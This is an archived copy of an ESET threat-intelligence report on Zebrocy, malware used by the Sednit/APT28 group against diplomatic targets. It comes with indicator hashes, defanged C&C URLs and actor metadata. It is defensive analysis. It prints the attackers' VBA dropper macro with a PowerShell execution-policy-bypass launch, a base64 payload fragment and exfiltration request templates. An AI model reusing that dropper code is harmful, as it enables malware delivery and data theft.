{ "id": "90189a22-e545-4ceb-acda-dcca6538a516", "created_at": "2026-04-06T00:06:47.105499Z", "updated_at": "2026-04-10T13:13:01.568202Z", "deleted_at": null, "sha1_hash": "54076ab6dafbe71c62a7f91882ac8db25a37562a", "title": "Sednit update: Analysis of Zebrocy", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 896084, "plain_text": "Sednit update: Analysis of Zebrocy\r\nBy ESET Research\r\nArchived: 2026-04-05 15:40:02 UTC\r\nThe Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – is a group of attackers\r\noperating since 2004, if not earlier, and whose main objective is to steal confidential information from specific\r\ntargets.\r\nToward the end of 2015, we started seeing a new component being deployed by the group: a downloader for the\r\nmain Sednit backdoor, Xagent. Kaspersky mentioned this component for the first time in 2017 in their APT trend\r\nreport and recently wrote an article where they quickly described it under the name Zebrocy.\r\nThis new component is a family of malware, comprising downloaders and backdoors written in Delphi and AutoIt.\r\nThese components play the same role in the Sednit ecosystem as Seduploader — that of first-stage malware.\r\nVictims we have seen targeted by Zebrocy are located in Azerbaijan, Bosnia and Herzegovina, Egypt, Georgia,\r\nIran, Kazakhstan, Korea, Kyrgyzstan, Russia, Saudi Arabia, Serbia, Switzerland, Tajikistan, Turkey,\r\nTurkmenistan, Ukraine, Uruguay and Zimbabwe. These targets include embassies, ministries of foreign affairs,\r\nand diplomats.\r\nThe Zebrocy family consists of three components. In the order of deployment these are a Delphi downloader, an\r\nAutoIt downloader and a Delphi backdoor. Figure 1 shows the relationship between these components.\r\nIn this article we describe this family and how it can coexist with the older Seduploader reconnaissance tools. We\r\nwill talk about some similarities to and differences from Downdelph at the end.\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 1 of 15\n\nFigure 1: The Sednit ecosystem\r\nFigure 1 shows the attack methods and active malware used by Sednit. Email attachments are the main entry point\r\nto the Sednit ecosystem. DealersChoice is still being used, as research from Palo Alto Networks mentioned in this\r\nrecent blogpost. Both Seduploader and Zebrocy are actively being delivered by the Sednit group through email\r\nattachments. Finally, after a reconnaissance phase, Xagent and Xtunnel are deployed on the targets deemed\r\ninteresting by the operators.\r\nAttack methods\r\nThe first component of a Zebrocy-based attack arrives as an email message. Victims are lured into opening email\r\nattachments that can be either Microsoft Office documents, or an archive.\r\nMalicious documents\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 2 of 15\n\nMalicious documents used by Sednit download the first stage payload via Visual Basic for Applications (VBA),\r\nexploits or even using Dynamic Data Exchange (DDE).\r\nAt the end of 2017, the Sednit group launched two campaigns delivering two different malicious documents. The\r\nfirst was named Syria - New Russia provocations.doc and the second named Note Letter Mary Christmas\r\nCard.doc.\r\nFigure 2: Zebrocy’s malicious documents\r\nBoth malicious documents contain a VBA macro that creates a randomly-named file in %TEMP%. The malware\r\nexecutable is then decoded and written into this file, which is then executed via a PowerShell command or via\r\nScriptable Shell Objects.\r\n[...]\r\nSub AutoClose()\r\nOn Error Resume Next\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 3 of 15\n\nvAdd = \"\"\r\nFor I = 1 To 8\r\nvAdd = vAdd + Chr(97 + Rnd(20) * 25)\r\nNext\r\nvFileName = Environ(\"temp\") \u0026 \"\\\" + vAdd \u0026 \".e\" + \"x\" \u0026 \"e\"\r\nSaveNew vFileName, UserForm1.Label1.Caption\r\nApplication.Run \"XYZ\", vFileName, \"WScript.Shell\"\r\nEnd Sub\r\nPublic Function XYZ(vF, vW)\r\nvStr = \"powershell.exe -nop -Exec Bypass -Command Start-Process '\" + vF + \"';\"\r\nCall CreateObject(vW).Run(vStr, 0)\r\nEnd Function\r\n[...]\r\nTVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu\r\n[...]\r\nExample of Visual Basic function and base64 encoded first stage from Syria - New Russia provocations.doc\r\ndocument.\r\nArchives\r\nSome campaigns have used an archive to drop the first stage on the victim computer, rather than Office document\r\nmacros. The archive is presumably delivered as an email attachment.\r\nAll first stage of the Zebrocy family are executables with an icon and a document-like filename intended to trick\r\nthe victim as shown in the Figure3.\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 4 of 15\n\nFigure 3: Zebrocy first stage using a Word document icon\r\nDelphi downloader\r\nA Delphi downloader is the first stage of the Zebrocy family, although we have seen some campaigns from the\r\nSednit group using the AutoIt stage directly without using this downloader. Most of these Delphi downloader\r\nbinaries use Office document icons or other icons like Windows library, and sometimes these samples are packed\r\nwith UPX. The purpose of this stage is quite straightforward: it retrieves a maximum of information from the\r\nvictim's computer.\r\nWhen the malware is launched, a splash window pops up with a bogus error message and the filename of the\r\ndropped binary. For example, if the filename is srsiymyw.exe, the filename that appears in the splash window will\r\nbe srsiymyw.doc (see Figure 4). The pop-up’s purpose is to distract the user so that he won't think anything\r\nunusual is happening on his computer.\r\nFigure 4: Delphi downloader splash window\r\nIn fact, the downloader is busy creating a file under %TEMP% with a filename hardcoded in the binary (although\r\nat this stage, the file is empty). Persistence is implemented by adding a Windows registry entry under\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ with the path of the hardcoded filename.\r\nTo gather information, the malware creates a new process using the Windows API CreateProcess function with\r\ncmd.exe /c SYSTEMINFO \u0026 TASKLIST as lpCommandLine argument. Once the information is retrieved, it\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 5 of 15\n\nsends the result via a HTTP POST request to the C\u0026C server hardcoded in the binary. It retries until it receives the\r\nnext stage.\r\nPOST (\\/[a-zA-Z0-9\\-\\_\\^\\.]*){3}\\.(php|dat)?fort=\u003cSerialNumber_C\u003e HTTP/1.0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: xxxx\r\nHost: \u003cip_address\u003e\r\nAccept: text/html, */*\r\nAccept-Encoding: identity\r\nUser-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1\r\npol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A\u003cDriveListing\u003e%0D%0A%0D%0A\u003cPath_to_the_binary\u003e%0D%0A%0D%0A\u003cSYSTEMINFO \u0026\r\n[...]\r\nDelphi downloader HTTP POST request\r\nOnce the request has been sent, the C\u0026C server responds by sending the next stage, if the target is considered\r\ninteresting by the operator. The time elapsing between the sending of the report and the receipt of the payload is a\r\nfew hours. This next stage is written into the file created earlier and executed.\r\nAutoIt downloader\r\nThe AutoIt downloader is another layer of the reconnaissance phase during an infection of the victim computer.\r\nFrom this point onwards, two scenarios are possible: in the first one, the Delphi downloader is the first stage and\r\nthe second stage – which is the AutoIt downloader – is a lightweight downloader. In the other scenario, the AutoIt\r\ndownloader is the first stage and it has all functionalities of the Delphi downloader and even more.\r\nWhen the AutoIt downloader is the first stage it performs many reconnaissance functions. Even if this one shares\r\nsome similarities with the Delphi downloader, such as the persistence mechanism and the splash window, it adds\r\nmore granularity to the reconnaissance phase than that of the Delphi downloader. Here is a non-exhaustive list of\r\nits capabilities:\r\nDetect sandbox and virtual environment\r\nGet list of installed software (via HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall)\r\nGet Windows version (32-bit or 64-bit)\r\nGet the process list\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 6 of 15\n\nGet hard drive information\r\nGet screenshot\r\nGet various information about the victim computer using Windows Management Instrumentation (WMI)\r\nobjects, probably inspired by code from this GitHub repository\r\nDepending on the previous stage, the name of the AutoIt binary is different. If the malware is dropped as the first\r\nstage, it has a document-like name. Otherwise it is given the name hardcoded in the Delphi downloader, as shown\r\nin Table 1.\r\nTable 1: AutoIt binary filenames, depending of the first stage #colspan#\r\nFirst Stage AutoIt binary Filenames\r\nDelphi downloader csrsvc.exe\r\nEmail attachment Protocol List_20160606.exe\r\nThe purpose of this stage is more of less the same as the previous one. There are many different versions in the\r\nwild but all of them include at least the code to achieve the following:\r\nRetrieve the serial number of the hard drive C:\r\nUse network functions from winhttp.dll or winhttp.au3\r\nExecute the payload received from the C\u0026C server\r\nIn the same way that the Delphi downloader has a splash window, the AutoIt also has a splash window when it\r\ncomes from an email attachment – the AutoIt is the first stage. The splash screen is related to the binary icon. For\r\nexample, an AutoIt downloader with Adobe Reader as an icon displays a splash screen saying that the PDF file the\r\nvictim would be expecting to be displayed is corrupted. An AutoIt binary with a Word icon will display the\r\nfollowing popup asking for a password. The password is not considered here; we think it’s just a way to distract\r\nthe victim from the code’s real malicious activity.\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 7 of 15\n\nFigure 5: AutoIt downloader Word popup\r\nDelphi backdoor\r\nThe Delphi backdoor is the final stage of the Zebrocy chain of components. We have seen Zebrocy downloading\r\nthe Sednit group’s flagship backdoor, Xagent, in the past.\r\nUnlike the previous components, this one has an internal version number that doesn’t seem to be related to a\r\nspecific campaign. This version number has evolved over time, as shown in Table 2:\r\nTable 2: Delphi backdoor internal version history #colspan#\r\nPE timestamp version\r\n2015-12-28 2.1\r\n2016-01-06 2.2\r\n2016-01-25 2.3\r\n2016-02-03 2.4\r\n2016-03-14 2.5\r\n2016-04-08 3.0\r\n2016-04-26 3.2\r\n2016-06-01 4.4\r\n2016-09-08 5.0\r\n2016-12-15 5.1\r\n2017-06-01 7.0\r\n2017-09-26 8.0\r\n2017-10-12 8.1\r\n2017-11-12 8.2\r\n2017-12-26 8.5\r\n2018-01-09 8.6\r\n2017-12-18 10.1\r\n2018-01-09 10.2\r\n2018-01-16 10.3\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 8 of 15\n\nTable 2: Delphi backdoor internal version history #colspan#\r\n2018-01-18 11.0\r\n2018-02-07 12.0\r\n2018-03-05 13.0\r\n2018-03-06 13.1\r\n2018-03-14 14.0\r\n2018-03-28 14.1\r\nNotice that we don’t have the full visibility and we may have missed some versions of the backdoor. Besides,\r\nthere is some overlap between versions meaning that some older versions are still used at the same time as newer\r\nversions.\r\nIn the next few paragraphs we will highlight some differences seen in the malware during its evolution.\r\nThe backdoor embeds a block of configuration. The configuration values change from one sample to another, but\r\nthe list of configurable items stays the same. However, the way in which the configuration data are stored in the\r\nmalware sample has evolved over time.\r\nThe first versions of the backdoor embedded the configuration data in plaintext, as shown in Figure 6.\r\nFigure 6: Delphi backdoor plaintext configuration data\r\nThen, in later versions, the malware’s authors encoded the configuration data as hexadecimal strings, as shown in\r\nFigure 7.\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 9 of 15\n\nFigure 7: Delphi backdoor encoded configuration data\r\nIn the latest versions, the configuration data is encrypted in the resources using the AES algorithm. Older versions\r\nstored it in the .text section.\r\nThe configuration data contains:\r\nAES keys to communicate with the C\u0026C server\r\nURLs with paths differing from one sample to another\r\nThe version of the malware\r\nThe windows registry key/value that ensures the persistence of the backdoor\r\nPath where temporary files are store (%APPDATA%)\r\nThe names of hidden directories to be created to store temporary files: the directory filenames are\r\nconcatenated with the environment variable (%APPDATA%)\r\nOnce the malware is set up, it executes callback functions via the Windows API function SetTimer. These\r\ncallbacks allow the operator to handle many features and commands of the backdoor.\r\nTake a screenshot of the Desktop of the victim\r\nCapture keystrokes\r\nList drives/network resources\r\nRead/write into Windows registry\r\nCopy/move/delete a file system object\r\nExecute files or create scheduled tasks\r\nThe number of commands handled by the backdoor – about 30 – differs from one version to another.\r\nTo communicate with the C\u0026C server, the backdoor stores the report of these functions into a temporary file. Then\r\nit will read the content of the temporary file and send it on. These temporary files are stored in one of the hidden\r\ndirectories created during the set-up phase.\r\nPOST (\\/[a-zA-Z0-9\\-\\_\\^\\.]*){3}\\.(php|dat). HTTP/1.0\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=--------\u003cmmddyyhhnnsszzz\u003e\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 10 of 15\n\nContent-Length: \u003cN\u003e\r\nHost: \u003cip_address\u003e\r\nAccept: text/html, */*\r\nAccept-Encoding: identity\r\nUser-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n----------\u003cmmddyyhhnnsszzz\u003e\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"%APPDATA%\\Microsoft\\\u003cdirectories\u003e\\\u003ctempfilename\u003e.tmp\"\r\nContent-Type: \u003ctempfilename_hex_encoded\u003e.tmp\r\n\u003ctempfilename content\u003e\r\n----------\u003cmmddyyhhnnsszzz\u003e--\r\nDelphi backdoor POST request\r\nThe tempfilename content is the output of whichever commands are executed. The content is encrypted using the\r\nAES-256-ECB algorithm with the first AES key from the configuration data, then the output is hexadecimal\r\nencoded. The contents sent to the C\u0026C server vary from one command to another, but all contains at least the\r\nHDD serial number and the first four bytes of the computer name.\r\nFor example, HELLO corresponds to the first packet sent by the backdoor to establish contact with the C\u0026C\r\nserver. As shown below it contains the date when the task was launched, the Delphi backdoor’s internal version\r\nnumber, the HDD serial number, the computer name (first four bytes), the command and the date when the\r\nbackdoor was executed.\r\nStart: 1/4/2018 1:37:00 PM - [\u003cvx.x\u003e]:42424242ESET-HELLO-[2018-04-04 01-37-00]-315.TXT.\r\nThe second AES key in the configuration data is used to decrypt the answer from the C\u0026C server.\r\nLike Seduploader, this backdoor is used to deploy Xagent on victim machines apparently deemed “interesting” by\r\nthe operators after the reconnaissance phase.\r\nSummary\r\nA component written in Delphi is nothing new for the Sednit group, which has already used this language for\r\nDowndelph. However, even if this latest component has nothing else in common with Downdelph  “technically\r\nspeaking”, there are some points of interest worth mentioning.\r\nThe deployment methods are the same, both being delivered as an email attachment.\r\nWe saw Downdelph for the last time in September 2015, and the first sample of Zebrocy we saw in the\r\nwild was dated November 2015.\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 11 of 15\n\nBoth are written in Delphi.\r\nWe can hypothesize that the Sednit group abandoned one component and started to develop a new one. One thing\r\nthat doesn’t change for the group, however, are the mistakes they made:\r\nThe name of the scheduled task: Windiws\r\nThe function name that retrieves system information in the AutoIt downloader is _SOFWARE()\r\nMary instead of Merry in Note Letter Mary Christmas Card.doc\r\nThe byte arrays used by the Delphi backdoor as AES-256 keys are 38 bytes long instead of 32 bytes. It’s not a\r\nspelling error but probably due to a lack of attention.\r\nWe have seen Zebrocy being heavily used by the Sednit group over the last two years. Our analysis of the many\r\nnew variants that appeared on a regular basis since 2017 clearly indicates that Zebrocy is being actively\r\nmaintained and improved by its author(s). We can consider it as one of the stable, mature tools in Sednit's arsenal,\r\na tool that deserves to be monitored closely.\r\nIoCs\r\nMalicious documents\r\nSHA-1 ESET Detection name Filename\r\n4f07d18475601d0492cbf678ee0f0860c729910e VBA/TrojanDropper.Agent.YC\r\nNote Letter Mary\r\nChristmas Card.doc\r\nf10b2c052afc07e2dec9dbe816031059fdc900ba VBA/TrojanDropper.Agent.AAK\r\nSyria - New Russia\r\nprovocations.doc\r\nDelphi downloader\r\nSHA-1 ESET Detection name\r\n00b39f2deaf1f1fc29e5acb63f4d1100e04fd701 Win32/TrojanDownloader.Delf.CFS\r\n07e44b44c5f1043d16f6011a2cf0d2e7c5a52787 Win32/TrojanDownloader.Delf.CFG\r\n0f946f619ae8e2181a5bd76c8af03347742765c6 Win32/TrojanDownloader.Delf.CGW\r\n2900ed173a9f5dc99f905942a6be595cc6f03387 Win32/TrojanDownloader.Delf.CFG\r\n2b5a7f4e054d0130883c8821b629121e0228bf54 Win32/TrojanDownloader.Delf.CIP\r\n36b5e59a01e7f244d4a3bbb539e57aa468115dc8 Win32/TrojanDownloader.Delf.CGB\r\n37bd951c483da057337ef8f38d6e48051cbb39d0 Win32/TrojanDownloader.Delf.CHC\r\n41686703ce9e9aec64b6ad1c516746751219bc62 Win32/TrojanDownloader.Delf.CFS\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 12 of 15\n\nSHA-1 ESET Detection name\r\n4e6470f4a245efaa138c8c6eedb046e916706383 Win32/TrojanDownloader.Delf.CGW\r\n54b14fc84f152b43c63babc46f2597b053e94627 Win32/TrojanDownloader.Delf.CGB\r\nafd5a60b7fff4deea15f7011339ad2cc2987a937 Win32/TrojanDownloader.Delf.CGW\r\nd4ab51bc5c26183771e3358d76e348943f9dd2fc Win32/TrojanDownloader.Delf.CGB\r\nd6fdc72792ee736b8d606d40d72cb89d6e8a3e18 Win32/TrojanDownloader.Delf.CFU\r\nAutoIt downloader\r\nSHA-1 ESET Detection name\r\n0cd61d367dd0b13000774ab77abf3d4cfb713c8e Win32/TrojanDownloader.Autoit.ODO\r\n185ab7a371b58ff367c155ec0dabe28842d340bd Win32/TrojanDownloader.Autoit.OBG\r\n267abd7105ac26d5cb6ecb96292f83708f64b994 Win32/TrojanDownloader.Autoit.OHC\r\n4a6dcbccab5344388b331d543cc2260ca531c7ca Win32/Autoit.CT\r\n62dcf2f33ecc6014fa9a10f4e9ac9fd9bb0a6d23 Win32/TrojanDownloader.Autoit.OCO\r\nb8b847d3d0139db68dba730b3424b29dcb40b3c7 Win32/TrojanDownloader.Autoit.OMA\r\nc0271dbb02636402742c390ffbeee6418f696668 Win32/TrojanDownloader.Autoit.OMB\r\nd379b94a3eb4fd9c9a973f64d436d7fc2e9d6762 Win32/Spy.Autoit.EI\r\ndabeadf0a9af3a8a0802f8445670806cd7671b1d Win32/TrojanDownloader.Autoit.OCI\r\nDelphi backdoor\r\nSHA-1 ESET Detection name\r\n0983d940ba42135106bf7a1e87ed5a1975fc7ead Win32/Delf.BFF\r\n226083c7190f1a939d5b7b352400450690d59f65 Win32/Delf.BDW\r\n245868d6805c66181808973e93f23293d6d2f7d1 Win32/Delf.BDT\r\n2c01ae417e5de213845b1ed46d4e82d45edd598d Win32/Delf.BBP\r\n4ccbe222bd97dc229b36efaf52520939da9d51c8 Win32/Delf.BFC\r\n51ae516792570bcd069a657c27859cd3fdc07d00 Win32/Delf.BBP\r\n55179f0c6bce5a37311a44efe3f9845096c09668 Win32/Delf.AWE\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 13 of 15\n\nSHA-1 ESET Detection name\r\n6fd7ce97061169b835ea77976651b5bf20aca4ef Win32/TrojanDownloader.Delf.BRV\r\n7349843e4dac1226ad6ce3e3cda8c389dd599548 Win32/TrojanDownloader.Delf.BRV\r\n7b5c223a4968cc2190c1b5444cad47187d27ec50 Win32/TrojanDownloader.Delf.BRV\r\n83882e13b369986b513f4aae245c112b82ec2097 Win32/Delf.BEB\r\n8aedf7a462024acf72d708c89230e4f02d94bc78 Win32/Delf.BDT\r\n8bd56b580974ae195e9f92b3aa525547d33434c1 Win32/Delf.BEC\r\n9beacd8e145fa01e16409d44d8b9470af6c7afd8 Win32/Delf.BBP\r\na172fe6e91170f858c8ce5d734c094996bdf83d0 Win32/Delf.BDT\r\nae93b6ec2d56512a1c7e8c053d2a6ce6fdfb7e4c Win32/Delf.BEX\r\nc08d89c7f7be69d5d705d4ac7e24e8f48e22faaf Win32/Delf.BDW\r\nc2f3ca699aef3d226a800c2262efdca1470e00dc Win32/Delf.AVP\r\ncdf9c24b86bc9a872035dcf3f53f380c904ed98b Win32/Delf.BEH\r\nf63e29621c8becac47ae6eac7bf9577bd0a37b73 Win32/Delf.AVT\r\nfea8752d90d2b4f0fc49ac0d58d62090782d8c5b Win32/Delf.BFN\r\nURLs\r\nhttp://142[.]0.68.2/test-update-16-8852418/temp727612430/checkUpdate89732468.php\r\nhttp://142[.]0.68.2/test-update-17-8752417/temp827612480/checkUpdate79832467.php\r\nhttp://185[.]25.50.93/syshelp/kd8812u/protocol.php\r\nhttp://185[.]25.50.93/tech99-04/litelib1/setwsdv4.php\r\nhttp://185[.]25.50.93/techicalBS391-two/supptech18i/suppid.php\r\nhttp://185[.]25.51.114/get-help-software/get-app-c/error-code-lookup.php\r\nhttp://185[.]25.51.164/srv_upd_dest_two/destBB/en.php\r\nhttp://185[.]25.51.198/get-data/searchId/get.php\r\nhttp://185[.]25.51.198/stream-upd-service-two/definition/event.php\r\nhttp://185[.]77.129.152/wWpYdSMRulkdp/arpz/MsKZrpUfe.php\r\nhttp://188[.]241.68.121/update/dB-Release/NewBaseCheck.php\r\nhttp://194[.]187.249.126/database-update-centre/check-system-version/id=18862.php\r\nhttp://194[.]187.249.126/security-services-DMHA-group/info-update-version/id77820082.php\r\nhttp://213[.]103.67.193/ghflYvz/vmwWIdx/realui.php\r\nhttp://213[.]252.244.219/client-update-info/version-id/version333.php\r\nhttp://213[.]252.244.219/cumulative-security-update/Summary/details.php\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 14 of 15\n\nhttp://213[.]252.245.132/search-release/Search-Version/crmclients.php\r\nhttp://213[.]252.245.132/setting-the-os-release/Support-OS-release/ApiMap.php\r\nhttp://220[.]158.216.127/search-sys-update-release/base-sync/db7749sc.php\r\nhttp://222[.]15.23.121/gft_piyes/ndhfkuryhs09/fdfd_iunb_hhert_ps.php\r\nhttp://46[.]102.152.127/messageID/get-data/SecurityID.php\r\nhttp://46[.]183.223.227/services-check-update/security-certificate-11-554/CheckNow864.php\r\nhttp://80[.]255.6.5/daily-update-certifaicates52735462534234/update-15.dat\r\nhttp://80[.]255.6.5/LoG-statistic8397420934809/date-update9048353094c/StaticIpUpdateLog23741033.php\r\nhttp://86[.]105.18.106/apps.update/DetailsID/clientPID-118253.php\r\nhttp://86[.]105.18.106/data-extract/timermodule/update-client.php\r\nhttp://86[.]105.18.106/debug-info/pluginId/CLISD1934.php\r\nhttp://86[.]105.18.106/ram-data/managerId/REM1234.php\r\nhttp://86[.]105.18.106/versionID/Plugin0899/debug-release01119/debug-19.app\r\nhttp://86[.]105.18.111/UpdateCertificate33-33725cnm^BB/CheckerNow-saMbA-99-36^11/CheckerSerface^8830-\r\n11.php\r\nhttp://86[.]106.131.177/srvSettings/conf4421i/support.php\r\nhttp://86[.]106.131.177/SupportA91i/syshelpA774i/viewsupp.php\r\nhttp://89[.]249.65.166/clientid-and-uniqued-r2/the-differenceU/Events76.php\r\nhttp://89[.]249.65.166/int-release/check-user/userid.php\r\nhttp://89[.]249.65.234/guard-service/Servers-ip4/upd-release/mdb4\r\nhttp://89[.]40.181.126/verification-online/service.911-19/check-verification-88291.php\r\nhttp://89[.]45.67.153/grenadLibS44-two/fIndToClose12t3/sol41.php\r\nhttp://89[.]45.67.153/supportfsys/t863321i/func112SerErr.php\r\nhttp://93[.]113.131.117/KB7735-9927/security-serv/opt.php\r\nhttp://93[.]113.131.155/Verifica-El-Lanzamiento/Ayuda-Del-Sistema/obtenerId.php\r\nhttp://93[.]115.38.132/wWpYdSMRulkdp/arpz/MsKZrpUfe.php\r\nhttp://rammatica[.]com/QqrAzMjp/CmKjzk/EspTkzmH.php\r\nhttp://rammatica[.]com/QqrAzMjp/CmKjzk/OspRkzmG.php\r\nSource: https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" ], "report_names": [ "sednit-update-analysis-zebrocy" ], "threat_actors": [ { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434007, "ts_updated_at": 1775826781, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/54076ab6dafbe71c62a7f91882ac8db25a37562a.pdf", "text": "https://archive.orkl.eu/54076ab6dafbe71c62a7f91882ac8db25a37562a.txt", "img": "https://archive.orkl.eu/54076ab6dafbe71c62a7f91882ac8db25a37562a.jpg" } }